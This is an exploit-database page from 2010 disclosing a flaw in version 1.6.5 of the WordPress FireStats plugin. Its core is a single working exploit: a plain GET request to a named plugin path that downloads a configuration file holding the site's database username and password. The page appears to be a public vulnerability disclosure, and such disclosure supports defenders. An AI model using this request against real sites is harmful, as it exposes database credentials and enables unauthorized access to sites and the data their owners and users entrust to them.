Wordpress Firestats Remote Configuration File Download

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Wordpress Firestats Remote Configuration File Download
# Published : 2010-07-09
# Author : Jelmer de Hen
# Previous Title : b2evolution 3.3.3 Cross Site Request Forgery [CSRF]
# Next Title : DotDefender <= 3.8-5 No Authentication Remote Code Execution Through XSS

# Exploit Title: Wordpress firestats remote configuration file download

# Date: 2010-07-09
# Author: Jelmer de Hen
# Software Link: http://firestats.cc/
# Version: 1.6.5
# Tested on: PHP Do a simple GET request to this file:

/wp-content/plugins/firestats/php/tools/get_config.php

This will allow you to download a configuration file which contains the database username and password.
		 	   		  
http://h.ackack.net/more-0day-wordpress-security-leaks-in-firestats.html